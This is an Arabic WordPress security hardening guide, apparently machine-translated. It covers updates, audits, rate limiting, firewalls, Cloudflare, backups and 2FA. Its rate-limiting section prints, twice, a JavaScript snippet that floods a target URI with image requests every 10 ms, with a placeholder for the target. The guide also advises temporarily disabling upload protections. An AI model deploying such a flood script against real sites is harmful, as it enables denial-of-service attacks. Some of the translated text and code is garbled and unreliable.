مقدمة

أمان الموقع أمر بالغ الأهمية ، خاصة في مواجهة التهديدات الإلكترونية المتطورة بشكل متزايد. يوفر هذا الدليل خطوات عملية لتحصين موقع الويب الخاص بك في WordPress مقابل نقاط الضعف المشتركة.

1. سمات وورد وورد آمنة ومحدثة ومكونات الإضافات

• تجنب البرامج المقرصنة: لا تستخدم أبدًا السمات أو الإضافات غير المرخصة ؛ غالبا ما يتم اختراقها. مصادر موثوقة مع الدعم المستمر هي أمر بالغ الأهمية. بالنسبة للمشاريع على مستوى المؤسسات ، فكر في موضوعات مميزة من مقدمي الخدمات ذات السمعة الطيبة الذين يقدمون أمنًا ودعمًا قويين.

• تحديد أولويات الموضوعات التي يتم صيانتها جيدًا: اختر الموضوعات ذات التطوير النشط والتحديثات العادية. هذا يضمن الوصول إلى بقع الأمان الحرجة.

• WordPress مقطوعة الرأس: استكشاف باستخدام WordPress باعتباره CMs بدون رأس مع أطر مثل NextJs و WP Rest API. يمكن أن تعزز هذه الهندسة المعمارية الأداء والأمان.

2. تنفيذ ممارسات أمنية قوية

• تحديثات منتظمة: حافظ على WordPress Core والموضوعات والإضافات المحدثة إلى نقاط الضعف المعروفة.

• تدقيق الأمن: توظيف أدوات مثل WPSCAN (بالنسبة إلى نقاط الضعف الخاصة بـ WordPress) ، وبربسويت (لفحص الرأس والملفات تعريف الارتباط) ، و NMAP (لتحديد وتأمين المنافذ المفتوحة مثل SSH أو WP-Cli).

• SSH و WP-Cli تصلب: تأمين وصول SSH وإدارة WP-Cli بحذر لمنع الوصول غير المصرح به.

• تعطيل طرق واجهة برمجة التطبيقات غير المستخدمة: إلغاء تنشيط نقاط نهاية واجهة برمجة التطبيقات غير الضرورية (على سبيل المثال ، rest_route =/wp/v2/user

الوقاية من تسرب البيانات:
• مسح المحتوى بانتظام للتعرض العرضي للمعلومات الحساسة مثل أسماء المستخدمين أو بيانات الاعتماد.

3. معدل الحد من الحماية المحسنة

الحد من طلبات المستخدم لمنع سوء المعاملة والتخفيف من هجمات DDOS. قد يكون الحد المعقول 500 طلب في الدقيقة ، مع تدابير لمنع حركة المرور المفرطة.

يوضح البرنامج النصي التالي كيف يمكن أن يطغى البرنامج النصي البسيط خادمًا:
وظيفة floodimagesxyz () { var target = "" ؛ // إضافة الهدف URI var uri = "/index.php؟" ؛ var pic = new image () ؛ var rand = math.floor (math.random () * 100000000000000000000) ؛ يحاول { pic.src = "http: //" target uri rand "= val" ؛ } catch (خطأ) { console.log (خطأ) ؛ console.log ("خطأ في:" ، uri) ؛ } } setInterval (floodimagesxyz ، 10) ؛

function floodImagesXYZ() {
  var TARGET = ""; // ADD TARGET URI
  var URI = "/index.php?";
  var pic = new Image();
  var rand = Math.floor(Math.random() * 10000000000000000000000);
  try {
    pic.src = "http://"   TARGET   URI   rand   "=val";
  } catch (error) {
    console.log(error);
    console.log("Error in:", URI);
  }
}
setInterval(floodImagesXYZ, 10);

4. استخدام أدوات وتقنيات التصلب

تقييد تحميلات الملف:
• تعطيل تحميل ملف PHP إن لم يكن ضروريًا لتقليل مخاطر الضعف.

تصلب على مستوى الخادم:
• قم بتنفيذ مقاييس أمان من جانب الخادم لمعالجة أذونات الملف وتوفير الضعف في تنفيذ البرنامج النصي.

5. اعتبارات منشئ الصفحة

عند استخدام بناة الصفحات (Divi ، Elementor ، WPBAKERY) ، تعطيل الأدوات الأمنية مؤقتًا التي تمنع تحميلات PHP أثناء التحرير لتجنب النزاعات.

6. أفضل ممارسات أمان الكود المخصص

مراجعة التعليمات البرمجية:
• مراجعة بدقة جميع التعليمات البرمجية المخصصة ، والضادة ، وتكامل الطرف الثالث لعيوب الأمان.

استخدم أدوات التطوير:
• توظيف أدوات مثل المكون الإضافي ، تحقق من مسيرة Plugin و Envato Themps و Phpunit و PHP Code Beautifier للحفاظ على جودة الرمز والأمان.

تعقيم البيانات والتحقق من صحة عدم الولادة:
• دائمًا ما يقوم بتطهير مدخلات المستخدم والتحقق من صحة غيرها لمنع انتهاكات الأمن.

7. تطبيق جدار الحماية على الويب (WAF)

نشر WAF:
• قم بتثبيت WAF مثل Wordfence لتصفية حركة المرور الضارة ، ومنع هجمات القوة الغاشمة ، والحماية من نقاط الضعف على تطبيق الويب الشائعة.

مراقبة استباقية:
• تمكين المراقبة النشطة لتسجيل وحظر النشاط المشبوه.

8. الاستفادة من CloudFlare للأمان المحسن

تكامل CloudFlare:
• دمج CloudFlare لتصفية حركة المرور الضارة قبل أن تصل إلى الخادم الخاص بك.

حماية DDOS:
• يوفر CloudFlare إمكانات قوية للتخفيف من DDOS.

9. النسخ الاحتياطية العادية والتعافي من الكوارث

نسخ احتياطية متسقة:
• حافظ على نسخ احتياطية محدثة من ملفاتك وقاعدة البيانات.

خطة الترميم:
• تطوير خطة استعادة واضحة لاستعادة موقعك بسرعة في حالة وقوع حادث.

10. مصادقة ثنائية العوامل (2FA)

تمكين 2FA لجميع الحسابات الإدارية لتعزيز الأمان حتى إذا تم اختراق بيانات الاعتماد.

11. recaptcha للأمان المحسن

recaptcha v3 لتسجيل الدخول:
• استخدم recaptcha v3 لصفحات تسجيل الدخول للحماية من هجمات الروبوت دون التأثير على تجربة المستخدم.

recaptcha v2 للنماذج:
• توظيف recaptcha v2 للنماذج لمنع تقديم الرسائل غير المرغوب فيها.

خاتمة

بينما لا يوجد نظام غير معقول تمامًا ، فإن نهج الأمان متعدد الطبقات يقلل بشكل كبير من المخاطر. تعد المراقبة الاستباقية ، والتحديثات العادية ، واستراتيجيات النسخ الاحتياطي القوية ضرورية للحفاظ على موقع ويب WordPress آمن. تذكر أن المتسللين مدفوعون بالمكاسب المالية ، مما يجعل الشركات أكبر وأكثر وضوحًا أهدافًا رئيسية.

المراجع وقراءة مزيد من القراءة